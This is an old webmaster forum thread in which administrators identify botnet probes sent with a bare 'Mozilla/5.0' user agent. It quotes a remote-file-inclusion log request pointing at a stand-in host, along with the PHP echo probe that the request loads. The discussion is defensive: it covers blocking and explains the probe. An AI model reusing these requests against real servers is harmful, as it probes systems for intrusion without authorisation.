Help identify attack tool with user agent: "Mozilla/5.0"

Forum Moderators: open

Message Too Old, No Replies

Help identify attack tool with user agent: "Mozilla/5.0"

Server exploit attacks from APNIC use this user agent

Wizcrafts

3:52 pm on Feb 27, 2010 (gmt 0)

I am trying to get some details about a thorn in my server-side ;-)

For a couple of years I have been blocking attack bots with the exact user agent: "Mozilla/5.0"

There must be a hacktool with that default UA, but I cannot find any details about it.

Evidence (from Korean IP space):

218.38.xyz.xyz - - [26/Feb/2010:23:00:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://example.com/columbus/heheh.txt? HTTP/1.1" 403 421 "-" "Mozilla/5.0"

Do any of you guys know what hack tool uses that default user agent? Most of these attacks have APNIC IP addresses, which I look up, convert into CIDRs, and add to my .htaccess and iptables Chinese Blocklists. The exploits are blocked by various rules in my .htaccess. I'm just curious about this user agent.

Thanks in advance; Wiz

[edited by: incrediBILL at 8:17 pm (utc) on Feb 27, 2010]
[edit reason] removed specifics to live bot net [/edit]

incrediBILL

4:02 pm on Feb 27, 2010 (gmt 0)

That's just a standard bot net attempting to upload a file to your server.

I get about 50+ of those every day for years now.

blend27

7:35 pm on Feb 27, 2010 (gmt 0)

Wizcrafts, i see those on hourly bases as well. Ask your self a question: Do I have any files on the server that end with ".txt"? That is all to it.

_{added: besides robots.txt}

Wizcrafts

7:47 pm on Feb 27, 2010 (gmt 0)

Guys;
I am already blocking all such exploit attacks. I was only asking if anybody knows what the actual hack tool might be, which has a default user agent of "Mozilla/5.0"? I am trying to identify the tool, not the attack vector.

incrediBILL

8:16 pm on Feb 27, 2010 (gmt 0)

Do I have any files on the server that end with ".txt"? That is all to it.

That's not it at all.

The file "http://example.com/columbus/heheh.txt" is a ping script residing on a compromised server they are attempting to upload into your server.

This is an active bot net running a live test for servers that respond.

The file heheh.txt looks like this:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

If your server echoes that text then they flag your server for a return trip by the hacker.

I was only asking if anybody knows what the actual hack tool might be

It's just a standard bot net script, tons of them, many variations, no specific tool.

Wizcrafts

8:47 pm on Feb 27, 2010 (gmt 0)

Thanks for the explanation Bill.

dstiles

9:00 pm on Feb 27, 2010 (gmt 0)

Thanks for the explanation of the txt? files, Bill. Always wondered what they expected to find. :)

My experience, Wizcrafts, is that a simple Mozilla/4.0 or Mozilla/5.0 on its own is usually from the Chinese block, though I have seen a few from the Eastern European countries. They aren't always loaded for .txt? or php files and I've wondered if they may be an Oriental MSIE work-alike, but it's worth blocking them.

blend27

1:01 am on Feb 28, 2010 (gmt 0)

Bill, you are absolutely right about botnets. What I mean is that any request that my sites are asked to serve with .txt extension are instant candidates for "Naturally Delicious Dried Mangoes". 403 Calories per serving to start with... due to the fact.